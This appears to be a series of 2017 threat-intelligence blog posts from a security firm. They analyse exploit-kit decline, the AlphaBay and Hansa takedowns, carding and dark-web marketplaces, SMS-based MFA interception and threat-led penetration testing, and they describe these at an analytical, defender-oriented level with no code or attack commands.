    Fluctuation in the Exploit Kit Market – Temporary Blip or Long-Term Trend? Wed, 16 Aug 2017 16:57:43 +0000 Exploit kit activity is waning. Collectively these malware distribution tools used to be a prominent method of infection. They rely on compromised websites, malicious adverts and social engineering to direct web traffic to their landing pages and attempt the exploitation of vulnerable software. Operated by various actors and groups, exploit kits possess different features, use various exploits and distribute different malware to victims. Since June 2016 at least four of the major players in this area ceased to be active. In this blog, I wanted to explore which exploit kits are still around and propose some plausible scenarios for the future of the exploit kit landscape.

    In memoriam

    Before we look at the active kits, let’s take a moment to remember those that have gone on to greener pastures (at least for now, some kits have a habit of rising from the dead). Note I’ve only referenced the major players from the last two years in this section:

    The survivors

    Despite these disappearances, the exploit kit landscape still represents a threat. Using mentions of exploit kits across social media and blogs that have been made by security researchers, we can formulate an indication of how active each exploit kit actually is. In the graph below, we can see that the RIG exploit kit has been mentioned most frequently from June until the time of writing; indicating it is likely to be the most prominent. All of the other kits shown in the graph, with the exception of Neutrino, still had some activity associated with them which showed they were still being deployed in the wild. Nevertheless, the rate at which they were detected and reported by researchers suggested they were likely less prevalent overall.

    Researcher mentions of exploit kit detections on social media and blog sites could provide reasonable insight into levels of exploit kit activity. Considering the findings, we assess it is highly likely the threat posed by EKs is less overall to what it was in June of 2016, and even the start of 2017. However, some exploit kits remain active and depending on the number of operators using them or the scale of the campaigns, the threat still remains. Exploit kits typically rely on out-of-date browsers, or browser plugins, therefore the primary mitigation for this threat is to ensure patches are implemented as soon as possible. In particular, exploit kit authors favor remote code execution exploits; our previous analysis of exploit kit payloads demonstrates this.

    Exploit Kit Activity

    Exploit Kit Mentions DarkWeb

     A potential reason for the decline of exploit kits

    The reasons for these disappearances were unconfirmed in most cases, but at least one EK developer was reported to have claimed it was no longer profitable.

    There were a number of other possible alternatives for this overall decline, including law enforcement action or the relatively resource intensive nature of exploit kit operations. Running these operations can be laborious:

    1. Software development of the exploit kit.
    2. Acquisition of remote code execution exploits for browser-related software
    3. Registration of large numbers of domains to host the exploit kits
    4. Generation of traffic to the exploit kit landing pages for exploitation. Generating this traffic requires the compromise of websites, use of malicious advertising or use of spam emails.

    Furthermore, exploit kit operators contend with advert blockers, software updates and blacklists which all degrade the rates of successful exploitation. All of these factors suggest a realistic possibility that exploit kit developers or operators no longer consider them to be profitable. At a time when spam phishing campaigns were frequently used to distribute ransomware, a demonstrably lucrative type of malware, distributing malware via exploit kits is almost certainly highly resource intensive by comparison. We’ve recently seen actors experimenting with malware propagation within internal networks, shown by the TrickBot and Emotet banking trojans, which represents another method of spreading malware to multiple devices.

    Are exploit kits dying out?

    Based on the exploit kit trends we have observed over the last year, it is a realistic possibility that these tools will continue to be used less frequently as part of malware distribution in the long term. The use of large quantities of phishing emails containing document attachments with embedded scripts to download malware has been proven to be highly popular and successful in the least year. Therefore, threat actors could possibly move from exploit kits to malware distribution using this type of methods.  However, there are multiple scenarios to consider:

    1. Given a lack of competition one exploit kit might become the most dominant.  Large amounts of business going to one kit could allow it to be developed more frequently and for its developers to acquire new exploits.
    2. Following the disappearance of large exploit kits, new kits could emerge that attempt to fill the market gap.
    3. Exploit kits could decline overall but still be used in more targeted attacks. The compromise of the Polish Financial Supervision Authority website in February of 2017 involved the use of similar tactics, techniques and procedures to exploit kits.
    4. Technology to detect and block malicious emails could improve to the point that this distribution method becomes less viable, resulting in a return to exploit kit activity which depends on end point management of software updates or other patch management solutions.

    Scenarios are useful because they provide us with indicators to look for when examining threat landscapes. While it’s not always possible to say with full confidence how the future might look, the thought exercise itself can be useful. Despite these potential scenarios, exploit kits will almost certainly continue to remain a threat in the immediate future.

    All That Twitterz Is Not Gold: Why You Need to Rely on Multiple Sources of Intelligence Wed, 09 Aug 2017 19:17:43 +0000 Twitter has become an extremely valuable tool for security researchers; experts including Kevin Beaumont and PwnAllTheThings frequently post research findings on the site and following these feeds can be an excellent source for the latest developments in the information security space. However, during major incidents affecting organizations worldwide, including the outbreaks of wCry and NotPetya, relying too heavily on Twitter can cause major problems for organizations scrambling to respond.

    Unwitting misinformation

    On May 12th, when the scale of the spread of wCry began to become apparent, researchers and businesses scrambled to ascertain how the malware was spreading as security operations analysts attempted to harden their networks against the threat. During this period, many users and some media outlets speculated that the malware might be spreading via an email vector.

    WCry Email Vector 

    Figure 1 – Screenshot of tweet on a supposed email vector for wCry.

    Even though little specific information was available, many users assumed that email had been the vector.

     WCry Email Vector2

    Figure 2 – Screenshot of tweet on a supposed email vector for wCry.

    While this might often be a safe assumption, spam email is by far the most common vector for ransomware delivery. In this case it was an unproven assumption it later emerged that a major contributor to the confusion was a spam campaign delivering the Jaff ransomware which was highly active on the same day. While it was not confirmed until later, throughout the afternoon of May 12th, multiple researchers accurately identified the true propagation vector used by wCry – SMB. Unfortunately, in some instances security advice was given on the basis of this understandable confusion, potentially leading to security operations personnel spending time hunting spam emails while a greater threat lay elsewhere.

     WCry Vector3

    Figure 3 – Notification from security software-as-a-service provider MailGuard.

    Information versus intelligence

    While potentially very useful, information derived from sources such as Twitter should always be treated with caution and assessed in the context of information derived from other sources, particularly when it’s being used to inform a security team’s actions in a time sensitive situation.

    This is the difference between information and intelligence; intelligence is aggregated data which has been assessed for credibility and presented in context with appropriate caveats for uncertainty and an assessment of significance. While intelligence must be timely to be useful, unassessed information which may be inaccurate can be even more damaging that the delay required to complete a full assessment.

    When the Digital Shadows analyst team investigated wCry on May 12th, we were able to identify indications that suggested spam emails were not the vector being used, leading us to pursue alternative hypotheses that the malware was spreading over SMB. While we are hugely appreciative of the work researchers do to raise awareness of security issues on Twitter and make extensive use of this source, we have found on many occasions that relying on this alone has the potential to lead to operational mistakes and misallocation of resources.

    Cybercrime Finds a Way, the Limited Impact of AlphaBay and Hansa’s Demise Mon, 07 Aug 2017 23:14:37 +0000 The law enforcement operations that took down the AlphaBay and Hansa marketplaces were meant to strike a sizable blow to the online trade of illegal goods and services. Frequenters of these services might now think twice before placing their trust in these unregulated platforms, and there may well be further arrests to follow as investigations and analysis into the materials seized in these raids run their course.

    However, when a drug enforcement operation completes a major bust or arrests a large number of individuals, there is often always another group, or new recruits, ready to fill the void. Similarly, our analysis of the broader cybercriminal ecosystem suggests that the impact of the AlphaBay and Hansa closures will be somewhat short-lived, for at least three reasons:

    1. The game of whack-a-mole continues, cybercrime will find a way

    With AlphaBay and Hansa out of the picture, sellers and users will flock to other marketplaces to continue trading as before. This has been evident already, with former AlphaBay and Hansa users advertising on established forums such as Dream Market, TradeRoute, House of Lions and Wall Street Market, which we focused on in our previous blog.

    Marketplace takedowns are not a new phenomenon. When Silk Road, once the largest and most popular dark web marketplace, was disrupted by the Federal Bureau of Investigation (FBI) in 2013, this only precipitated the growth of other, alternative platforms. AlphaBay grew from Silk Road’s closure and eventually took on the mantle of the most popular dark web market. Subsequent reincarnations of Silk Road in the form of Silk Road 2.0 and Silk Road 3.0 exemplify how the cycle will likely continue for the foreseeable future.  We have seen alternatives emerge as a result of marketplace exit scams as well. In 2015, administrators from the Evolution Marketplace stole an estimated 40,000 BTC. Dream Market was once of the beneficiaries of that exit scam.

    Just as Jeff Goldblum’s Jurassic Park character, Doctor Ian Malcolm says, “Life uh, finds a way,” cybercrime finds a way as well. Commerce must flow; buyers and sellers need to be connected.

    Cybercrime Finds a Way

    2. AlphaBay and Hansa were only a part of a broader cybercrime ecosystem

    Yes, AlphaBay and Hansa were two of the most popular English-language dark web marketplaces. And yes, they had dedicated sections for fraud-related goods (stolen payment card information, counterfeit documents, and compromised bank accounts), as well as malware and hacking tools (the RIG and Bleeding life exploit kits were previously advertised on AlphaBay). However, from an information security perspective, we should remember that most of the products advertised on these platforms were for drugs, weapons, and digital goods such as media accounts and service subscriptions.

    Our research shows that there are other forums specifically dedicated to hacking and security, which often act as a platform for trade. Sites like CrimeNet, HPC, and Exploit[.]in contain many examples of threat actors offering products such as ransomware variants, exploit kits, compromised accounts and payment card data. These sites work on a direct transfer system where vendors and customers will communicate directly to arrange payment, often through messaging services such as Jabber. Often sellers will advertise their products on these forums, and then direct users to dark web sites to then arrange payment. Where stolen databases have appeared on sites like Hansa, we assessed it to be highly likely that these datasets were previously traded widely through other criminal networks and then listed on these marketplaces only once their value had been exhausted.

    FileFrozr Ransomware

    Figure 1: Advert on deep  web forum HPC for FileFrozr ransomware

    Payment card fraud is a good example of why we should not focus too heavily on marketplaces. There are countless carding and Automated Vending Cart (AVC) sites dedicated to payment card fraud. These types of sites often provide tutorials and courses for novice fraudsters, as we highlight in our recent whitepaper. With new carding and AVC sites emerging every day, this type of activity will continue unabated despite the AlphaBay and Hansa takedowns.

    AVC Site

    Figure 2: AVC site allowing users to buy stolen payment card data

    3. Not all cybercrime occurs on the dark web

    Many carding, AVC and hacking sites are not actually found on the dark web, including HPC, CrimeNet and Exploit, which we mentioned above. Moreover, certain types of cybercrime do not need the “anonymity” provided by services such as Tor, or the advertising and transactional functions fulfilled by the marketplace model. Plenty of cybercrime occurs on the open and deep web.

    Extortion activity by the darkoverlord, a threat actor we have cited previously, illustrates this point. When the darkoverlord first came to our attention in June 2016, the actor relied heavily on dark web sites such as the Real Deal to advertise stolen datasets. Yet, since the closure of the Real Deal in November 2016, the darkoverlord has remained active and has made use of clear web sites such as Pastebin and Twitter to conduct extortion based activity. In June 2017, the darkoverlord released eight episodes of an un-aired American Broadcast company (ABC) show, posting a message to Pastebin that included a link to the torrent website The Pirate Bay. Three days later, the darkoverlord published over 6,000 medical records that allegedly belonged to a clinic in California. The documents were uploaded to the sharing site mega[.]nz after the clinic purportedly failed to respond to the ransom demands.

    While the AlphaBay and Hansa takedowns will likely provide significant intelligence gains, there will always be supply and demand for illicit goods and services. Digital Shadows will continue monitoring the development of the cybercriminal ecosystem, particularly in these turbulent times. Marketplaces were never seen as the go-to shop for rare exploits or sensitive datasets, and we expect the more sophisticated sellers to continue using more niche forums or private communication channels to flog their wares. Moreover, with other forms of cybercrime occurring outside of the dark web, organizations and individuals would be wrong to assume that the risk of a cyber-attack has now been significantly reduced.

    Reading Your Texts For Fun and Profit – How Criminals Subvert SMS-Based MFA Tue, 01 Aug 2017 13:57:24 +0000 Why Multi Factor?

    Read almost any cyber security related news and you will start to see why using a password alone isn’t the most secure way of preventing unauthorized access to your account. Multi-factor authentication (MFA) is invaluable because it adds extra obstacles for attackers attempting to access your account, hence why it has become such a popular account security control. There are different flavors of MFA ranging from codes sent via text (SMS), authentication applications, or physical devices. Naturally attackers are going to try and circumvent MFA, so we conducted some research into the ways SMS-based MFA could be subverted, which are outlined below.

    Threats to SMS Based Solutions

    Recently we came across a service that claimed to provide customers with the ability to redirect phone calls and text messages, advertised on at least one hacking forum for over a year and hosted on the Tor network (see Figure 1). Named “Interconnector” and offering “SS7 Services”, this was probably in reference to what is known as Signaling System No. 7 (SS7), a signaling language used to ensure that the networks of telecommunication companies can interoperate. For example, SS7 allows someone in one country to send messages to someone in another country. If this Interconnector service was genuine (although many forum users claimed it was a scam), it would almost certainly be deemed as valuable for threat actors. Why? Because the ability to intercept SMS messages would circumvent MFA protection which relies on tokens sent via this channel. This might include your social media accounts and your online bank accounts. It might even be used to authenticate online transactions.

    interconnector service

    Figure 1 – the “Interconnector” SS7 dark web service

    The abuse of SS7 for this purpose isn’t a pipe dream, there are at least a few examples of it being used maliciously in the past. In May 2017, it was reported that criminals had been able to access and steal funds from compromised bank accounts by redirecting SMS messages containing one time tokens and mobile transaction authorization numbers. There was also reporting in 2014 that a number of Ukrainian mobile subscribers’ phone calls had been redirected as a result of custom SS7 packets. The goal of the redirection is unknown at the time of writing.

    Although SS7 abuse is certainly interesting, MFA tokens can also be obtained via other means. For example, the Retefe banking trojan was used alongside mobile malware to harvest SMS codes, while the Dridex banking trojan harvested these codes and its operators used them in real time. Threat actors can also redirect messages and calls to different SIM cards; Wired published a report in June in which it claimed attackers were able to socially engineer employees at a telecommunications company in order to have a target’s calls and text messages redirected – otherwise known as “SIM Swapping”. Furthermore, so called “fake” mobile towers, or International Mobile Subscriber (IMSI) catchers, could also be used to intercept mobile traffic.

    All of these methods have their own limitations or requirements to be successful. All of them, for example, require an attacker to first obtain the relevant account credentials before they can consider intercepting MFA tokens. Furthermore, many of the examples we’ve highlighted in this blog require a relatively large amount of effort for the threat actors involved. Of these then, the abuse of SS7 would be most likely to be viable at scale, but the exact level of access and capability required to achieve such an attack isn’t entirely clear.

    Considering the Alternatives

    All of these methods and their use in the wild show that SMS-based two factor authentication (2FA) is not infallible and that criminals have an interest in circumventing it. In this context, it is unsurprising that NIST recommended in 2016 that “M” in MFA should not be SMS.

    Each method has its own advantages and disadvantages as well as capability requirements. However, someone with the appropriate capability and intent could successfully capture SMS-based MFA codes in order to access accounts, or conduct fraudulent transfers. There are some basic mitigation steps individuals could follow, including:

    1. Not clicking on links in suspicious or unsolicited emails or text messages
    2. Avoiding the download of mobile applications or games from unofficial stores
    3. Operate anti-virus solutions and keep them up to date
    4. Considering the use of alternative MFA such as authenticators such as hard tokens
    What is a Threat Model, and Why Organizations Should Care Mon, 31 Jul 2017 14:57:36 +0000 Many organizations are exquisitely aware that they are the target of a wide-range of cyber-attacks: from targeted intrusions to mere vandalism. Financial services companies, defense contractors, critical infrastructure providers are routine and expected targets. However, shifts in how interconnected and dependent organizations are have led to changes in how attackers see the value of a particular target. As mentioned in our previous blog “Keep your Eyes on the Prize”, how valuable an organization is to an attacker is not necessarily aligned with how important an organization sees itself. In order understand better the threats an organization faces; a threat model is typically developed.

    Threat Modeling Process

    Threat modeling is an iterative process that needs to be updated whenever there are substantial changes to either assets or threats. Typically the process consists of:

    1. Defining an organization’s assets – e.g., critical business processes, high-value systems, etc.
    2. Identifying which systems comprise those assets – e.g., databases, Enterprise Resource Planners (ERPs), etc.
    3. Creating a security profile for each system – e.g., which security controls are currently used to protect the identified software applications, such as, firewalls, Endpoint Detection and Response (EDR) systems, web proxies, etc. and which known vulnerabilities are present
    4. Identifying potential threats – e.g., hacktivists, cyber criminals, freelancers, nation states, etc.
    5. Prioritizing potential threats, and documenting adverse events and the actions taken in each case – e.g., working from known examples of documented attacks and internal risk concerns, attempting to foresee what the organizational impact of particular threats could be.

    If your organization does any of the following things, you may find the chosen case studies to be helpful in developing your own threat model:

    If you build things: if an organization builds devices which have internet connectivity, it needs a Secure Development Lifecycle (SDL).  The Mirai botnet illustrated this point by hijacking internet-connected devices which were not considered to be critical assets. The devices in question had default passwords and were connected to the public internet. Armed with a simple list of passwords, DVR appliances were readily compromised by Mirai and harnessed together to flood targets with up to 1.2Tbps of traffic.

    If you make software: widely-deployed or strategically-deployed software are both attractive targets for attackers. Backdooring carefully chosen software allows an attacker to gain access to a particular target. The Nyetna attack showed how a widely-deployed piece of software in a particular geography can become an extremely attractive target for attackers, effectively giving them access to over 400,000 endpoints with a single malicious update. The Havex malware was used in a campaign targeting Industrial Control Systems (ICS) by, among other vectors, backdooring the software installation files for three different ICS vendors. Compromises of this nature allow the attacker to have their malware deployed directly to their targets, most likely bypassing perimeter and other security controls.

    If you have an internet presence: attackers are always on the lookout for deniable infrastructure to use in their campaigns. Infrastructure that has a good level of connectivity and a poor security posture is ideal. It is no surprise that attackers such as the Equation Group used cloud hosted virtual machines and university computers to redirect traffic towards their targets. While asset owners may not consider their assets to be particularly sensitive, the value of having a reliable, deniable infrastructure which attackers can freely use for their own purposes is very high. The feasibility and speed of Internet-wide scanning means that vulnerable internet-connected machines do not remain undetected for long.

    If you store data: many organizations collect large amounts of data for their own purposes. In particular, data and metadata around how their customers are using their system. This data may well be part of an attacker’s collection requirements. The Equation Group compromise of Eastnets and potentially other SWIFT Service Bureaus shows that, while the organizations may consider security as part of their regular operations, they may face attacks from actors with a significantly higher capability than what they anticipated due to the perceived value of the data that they hold.

    Security is a global, pervasive responsibility for all organizations. It is clear that many organizations that did not consider themselves high value targets or with a high degree of responsibility for security may need to reconsider. Paranoia and hysteria are to be avoided, but a sober analysis of the real risks to an organization and, by extension, the other organizations or people it is a dependency for. An understanding attacker goals and security engineering principles, coupled with a robust approach to threat modelling, goes a long way to reducing the uncertainty around risk to an organization.

    Fraudsters Scoring Big – an Inside Look at the Carding Ecosystem Tue, 18 Jul 2017 18:52:49 +0000 In season two of the Netflix series Narcos, Pablo Escobar points out that: “I’m not a rich person. I’m a poor person with money.” In real-life, Escobar’s cartel reportedly made so much money (at one point $US420 million a week) that their chief accountant, Roberto Escobar, claimed that they “would write off 10% of the money because the rats would eat it in storage or it would be damaged by water or lost.” This “poor” person certainly had a lot of money.

    Online carding is another industry which is consistently lucrative for criminals, with payment card fraud to projected to reach $24 billion by the end of 2018. Our latest whitepaper reveals how criminals develop their capabilities and highlights a professional e-learning carding course, complete with webinars, instructors and reading material. This increased professionalization and sophistication of this fraud has negative implications for credit card companies, merchants and consumers.

     Online Carding Course

    Figure 1: An English translation of the carding course overview


    Whatever happened to EMV? Wasn’t payment card fraud meant to have been solved by the introduction of Chip and PIN? The implementation of EMV in the US has had its own problems. As I went to use my card over the weekend, I was prompted with the all-too-familiar message “No chip. Please swipe”.

    Chip not working 

    Figure 2: Many United States’ EMV terminals are disabled and force customers to swipe instead

    Recent research indicates that the increasing adoption of EMV has made physical card fraud more difficult, making Card Not Present (CNP) fraud more popular. CNP fraud occurs when the customer doesn’t physically present the card and uses card details online or over the phone. If we consider that annual online card spending will double to $6 trillion by 2021, this is a growth industry for cybercriminals.

    Just as in Narcos’ cocaine empire, CNP fraud is unlikely to be achieved by a criminal acting alone. They rely on a sophisticated ecosystem and support network that provides a wide range of credit card details, fraud tools and online tutorials. This includes:

    • Payment Card Data Harvesters – do the ‘dirty work’ in terms of harvesting the payment card information. This is done through intercepting card holder’s information whether this be through point of sale malware, skimming devices, phishing, breached databases, or through operating botnets
    • Distributors – are the ‘middle men’ who typically make the most money. While the criminals who harvest may use the card data themselves, they also sell it on to others who will package, repackage and sell on the card information
    • Fraudsters – run the most risk in terms of getting caught by law enforcement or being conned by fellow criminals. Once fraudsters have acquired payment card information from their distributor, the fraud can happen. These individuals tend to be less technical and attract a lower calibre of cybercriminal, often relying on online guides and courses to learn the latest techniques
    • Monetization – There are many different roles within the stage, including those who have been duped into operating drop addresses and those involved in the reselling of fraudulently acquired goods.

    Payment card fraud is not new, nor are online guides and courses for the fraudsters. However, the professionalism, reputation and freshness of this course provides useful insights for organizations across a range of industries as well as consumers. Download a copy of our latest paper to learn about the latest techniques and advice for merchants, payment card companies, and consumers.

    The Future of Marketplaces: Forecasting the Decentralized Model Mon, 17 Jul 2017 16:03:09 +0000 Last week we wrote about the disappearance of AlphaBay dark web marketplace and assessed three potential scenarios to look out for next. We briefly alluded to new models for criminal online commerce, such as those espoused by OpenBazaar. In this blog, we wanted to drill down into the drivers that would contribute to an increased interest in decentralized marketplaces.

    AlphaBay’s disappearance has highlighted a continuing problem with the marketplace model: users must trust site operators and other users who are anonymous, willing to commit crimes, and potentially untrustworthy. Other issues with the marketplace model include sites’ vulnerability to law enforcement; by targeting site operators law enforcement agencies can potentially seize servers and gather intelligence on users, shut a site down entirely, or even take it over and run it as a “honeypot”. In this case, a honeypot would be a deception operation in which law enforcement attempts to attract criminal actors engaged in illicit activity to use a law enforcement operated service in order to facilitate information gathering.

    An alternative model that precludes many of these issues is presented by P2P decentralized marketplaces, as recent reporting from DeepDotWeb  regarding a dark web marketplace project on the Ethereum platform dubbed “Tralfalmadore” has demonstrated.

    What is a Decentralized Marketplace?

    Decentralized marketplaces use blockchain technology: a project blockchain serves as the back-end for the marketplace, storing the necessary databases and code to support front-end user interfaces. All transactions are made using cryptocurrency and are recorded as smart contracts on the blockchain. This addresses problems with user trust — if all transactions are permanently and immutably recorded, vendors who attempt to scam other users can be more easily identified. Furthermore, platform operators have no control over listings and the platform is split among many nodes, making it highly resilient to law enforcement takedowns or attacks by other criminal actors.

    Forecasting Development

    In addition to Tralfalmadore, a project dubbed OpenBazaar has been active since Apr 2016. Despite its advantages over a traditional marketplace, the platform has not been used for criminal activity to any great extent and support for the decentralized model within the criminal ecosystem has remained low. Our monitoring of criminal sites has indicated that a significant proportion of former AlphaBay users have migrated to Hansa, another marketplace platform. Based on an examination of criminal forums and discussion boards, we have identified the following drivers likely to be significant in future development of decentralized criminal marketplaces.

    Decentralized Marketplace Table

    Figure 1 – Table of drivers likely to influence the development of decentralized criminal marketplaces.

    We assess that it is unlikely decentralized criminal marketplaces will become widely adopted in the near to mid-term future; at the time of writing, traditional marketplaces and P2P interactions on forums have remained by far the most common platforms for criminal commercial enterprises. Furthermore, no platform with popular appeal to criminal actors yet exists.

    However, if projects such as Tralfalmadore are able to become established, they are likely to become more widely used in the long term. Drivers identified in this article are likely to be viable measures for assessing the prospects of newly established decentralized criminal marketplaces.

    The potential future emergence of decentralized marketplaces within the criminal ecosystem poses significant challenges for law enforcement agencies and private security vendors. Although public blockchains can be freely mined for data, the very high volume of content is likely to make parsing this information and developing actionable intelligence very technically and logistically challenging. Furthermore, previous law enforcement operations targeting criminal marketplaces or forums have tended to revolve around targeting site operators or geolocating servers and conducting raids; neither of these would likely be effective for targeting a decentralized platform. In this scenario, it would be more effective to target individual prominent vendors or vendor networks and attempt to identify and locate them.

    Therefore, although decentralized marketplaces are unlikely to become significant within the criminal ecosystem in the near to mid-term future, they potentially represent a significant longer-term challenge for law enforcement and security vendors.

    AlphaBay Disappears: 3 Scenarios to Look For Next Fri, 14 Jul 2017 10:44:46 +0000 The AlphaBay dark web marketplace has been inaccessible since 05 Jul 2017. With no substantive explanation from the site’s owners, users have speculated that an either an exit scam (where administrators steal user cryptocurrency deposited to the marketplace and shut down the services) or law enforcement action has taken place. Dark web market exit scams are nothing new; the Evolution market exit scam infamously resulted in the loss of 40,000 bitcoins ($12 million). These exit scams are one of the risks when conducting business in criminal marketplaces. On 13 Jul 2017 the Wall Street Journal claimed that the disruption was caused by a combined US, Canadian and Thai law enforcement operation in which Canadian national Alexandre Cazes was arrested in Bangkok. Cazes, who was reportedly suspected of acting as an AlphaBay administrator, was reported to have committed suicide in Thai custody. At the time of writing there had been no official confirmation of the claims made by the Wall Street Journal. With each day that passes the prospect of AlphaBay returning becomes increasingly unlikely.

    So, what would a post-AlphaBay future look like? We believe there are at least three possible scenarios:

    1. An older, established marketplace will replace AlphaBay.

    As is often the case when a popular marketplace disappears, users will simply migrate to other established sites. Already we have seen former AlphaBay vendors advertising their products on other marketplaces, including Hansa and Dream Market. Sellers have leveraged their AlphaBay vendor ratings as a measure of their trustworthiness and reputation. Relocation is made easier as many established vendors and regular customers would have already had multiple accounts across the major markets.


    Figure 1: Hansa vendor highlighting their AlphaBay credentials

    With AlphaBay seemingly out of the picture, other sites will jostle for supremacy by trying to attract new users through advertising and membership deals. RS Club Market, for example, announced a referral offer on 09 Jul 2017 (a few days after AlphaBay’s disappearance) encouraging members to invite new users in return for 30% of the site’s commission fee. The House of Lions marketplace, similarly, has given AlphaBay sellers an opportunity to negotiate on the vendor fee if they can verify their experience and reputation.


    Figure 2: The House of Lions market has actively targeted former AlphaBay vendors

    Enlarging your customer base, however, brings its own challenges. Hansa users have reported issues with accessing the site in the last week. As Hansa does not require users to login to view products, a large increase in web traffic may have disrupted the service. Now Hansa administrators have been forced to suspend new registrations as the deal with “technical issues” caused by what they have called an “AlphaBay refugee” influx.


    Figure 3: Hansa has struggled to cope with the deluge of new registrations

    2. A new marketplace will arise from AlphaBay’s ashes

    Some AlphaBay users were so fond of their former haunt that they have created a new iteration of the marketplace, dubbed GammaBay. We discovered the following call to arms by a self-described AlphaBay veteran on Reddit: 


    Figure 4: Reddit post promoting GammaBay


    Figure 5: GammaBay site imitates the old AlphaBay design

    At this stage, the GammaBay site is still in its infancy, and the marketplace section remains unfinished. With only 20 members registered on the site so far, it is unlikely the new site will be able to reach the heights of its predecessor. Moreover, with rumors that AlphaBay had been disrupted by law enforcement, many users have expressed a reluctance to register for GammaBay, fearing that the site is actually a honey pot intended to lure in former AlphaBay vendors. Perceived trust in a market will play a large role in its chances of future success.


    Figure 6: Reddit user stating their suspicions about GammaBay

    3. Users will abandon the marketplace model and look for alternative solutions

    The fallout from AlphaBay’s disappearance could have far-reaching implications for the future of the marketplace model. If an exit scam has taken place, the declining trust in these markets may lead disillusioned users towards alternative methods for conducting online transactions. If law enforcement was responsible, then the risk of legal action will only encourage vendors to seek more secure and anonymized methods of trade.

    Although sites such as AlphaBay are very popular for goods such as drugs and credit card information, cybercriminals selling sensitive data or malware variants have frequently opted for direct peer-to-peer (P2P) communication and relationships made on specialized forums. While vendors and customers might lose the convenience of trading on a popular marketplace, they could decide that a P2P model will give them more control and help safeguard against exit scams and loss of funds.

    Following the seizure of Silk Road in 2013, some people began working on a new, fully-decentralized marketplace known as OpenBazaar. This open source project is a P2P marketplace that allows the unrestricted sale of goods between anonymous users. OpenBazaar is accessed through a front-end client which can be freely downloaded from the project website.  All transactions are made using Bitcoin and are recorded on the project Blockchain as cryptographically signed smart contracts.

    The Post-AlphaBay Future: Short- and Long-term Forecasts

    In the short-term, we assess that an existing marketplace such as Dream Market or Hansa will most likely fill AlphaBay’s shoes. The most successful marketplaces usually have a combination of: a user-friendly interface, administrator support services, attractive fee structures, and – crucially – a strong overall level of stability and reputation among the online community. As perhaps the two most established markets with the largest number of existing users, Dream Market and Hansa are best placed to capitalize. Nonetheless, as Hansa’s recent technical difficulties have highlighted, these sites will have to undertake improvements to ensure their user experience is in line with what members will demand. For Hansa and Dream Market, this will mean minimizing technical issues and refining their associated forum pages, which both pale in comparison to what the AlphaBay forum once offered.

    In the long-term, the fall of yet another popular dark web marketplace will only increase calls for a more secure, stable and trustworthy alternative to the current marketplace model. Here we believe P2P models such as that espoused by OpenBazaar have the potential to become increasingly attractive offerings to vendors and customers alike. It remains to be seen when a suitable platform will finally break through and disrupt the market. Digital Shadows will continue to track the demise of AlphaBay and its successors.

    Our next blog will explore the prospect of decentralized marketplaces in further detail.

    Threat Led Penetration Testing – The Past, Present and Future Mon, 10 Jul 2017 23:01:33 +0000 What is Threat Led Penetration Testing?

    Threat led penetration testing is, in essence, using threat intelligence to emulate the tactics, techniques and procedures (TTPs) of an adversary against a real time mission critical system. The concept is currently being implemented in a number of ‘flavors’ around the globe including schemes such as the UK’s STAR (Simulated Target Attack and Response) or CBEST scheme, the Netherlands TIBER (Threat Intelligence Based Ethical Red teaming) scheme and the Hong Kong based iCast schemes.

    The recent quarter has seen some extremely significant development within the realm of threat led penetration testing (TLPT). The concept of TLPT is rapidly expanding beyond the United Kingdom. TLPT advances the boundaries of conventional penetration testing by seeking to adopt the tactics, techniques and procedures of an advanced threat actor aggressively targeting a critical system. You can read more about TLPT in a previous blog. Our work with the first two Dutch TIBER projects, as well as our workshop at the Bahrain International Cyber Security Forum & Expo, are great examples of this.

    Given this expansion, I wanted to review of where the TLPT concept has come from and where it may be going to.

    The Past

    The origins of TLPT began with the UK’s CBEST scheme in 2013, to which Digital Shadows was a major contributor both in terms of the development of the original framework and the implementation of the actual projects.  Since then, there have been around fifty CBEST style engagements of which Digital Shadows has carried out the majority, from which three lessons have emerged:

    1. It has to be testable. Any testing scenario put forward by the Threat Intelligence provider has to be testable by the penetration test partner, with the scope of their capabilities. In practice this means less abseiling through open windows and more focus on technical exploits such as the indicators of compromise associated with specific threat groups.
    2. The importance of the ‘golden thread’. This is an easy concept to outline but a challenge to implement. As the report moves from the initial quantitative, data collection stages to the later, qualitative scenario building, the report should create activities linking data, information and intelligence into a “golden thread”. In practice doing this is really quite simple, for example taking client emails that have been implicated in various data breaches and focusing phishing campaigns against them.
    3. Creative versus effective scenarios. The culmination of a TLPT (the TI phase at least) all revolves around the attack scenario following the Exposition, Rising Action, Climax, Falling Action and Dénouement structure. While it can be tempting to devise elaborate scenarios, its important to remember that the core objective of a scenario is to successfully compromise the target system at the lowest level technically possible.

    The Present

    The CBEST scheme has been a huge success, which has led to the concept of TLPT being expanded beyond the financial services in the UK. Currently Hong Kong and the Netherlands have ‘in flight’ schemes with Singapore and the United States considering implementing their own proprietary schemes.

    • Sector diversification is happening, specifically across the telecoms, nuclear, wider energy and even space sectors. Although the sectors are varied, the principle of TLPT is the same – to test real time in flight critical systems using the TTPs of real world threat actors.
    • Regional expansion is rapidly occurring with Hong Kong, Singapore, The Netherlands and the USA all looking to develop and implement variants of TLPT.

    The Future

    it is worth a speculating about some of the features that I feel will become fixtures within TLPT in the future.

    • Iterative development of scenarios within the penetration test phase. Future TLPT will iteratively update the threat profiles based upon the results of the penetration test phase. This will result in a set of scenarios that are all viable but only under specific sets of circumstances. This would shift the current scenarios metric from ‘viable or not?’ to a more nuanced ‘viable under these circumstances. This could be a high-level insider threat with zero day vulnerability. This would create a situation where defenders could then assess the likelihood of a scenario coming to fruition based on the threat actor’s and level of defences.
    • Reuse of the result. On average, the results of a TLPT have a shelf life of between 18 and 24 months. Therefore, the organization has the opportunity to reuse the final result for a number of technical and non-technical exercises, such as a crisis management workshop for executive leadership.
    • Broader range of organizational testing. There is huge potential of TLPT to expand out from just being a technical test to encompass non-technical element of the client organization risk management framework, such as crisis management workshops and media management workshops.

    The success of the CBEST scheme and the subsequent expansion suggests that threat led penetration testing is an exciting trend. Of course, CBEST and TIBER are evolving rapidly, and so predicting the future adoption by providers and users is unknown. However, by building on past successes and learning lessons, threat led penetration testing could go from strength to strength.

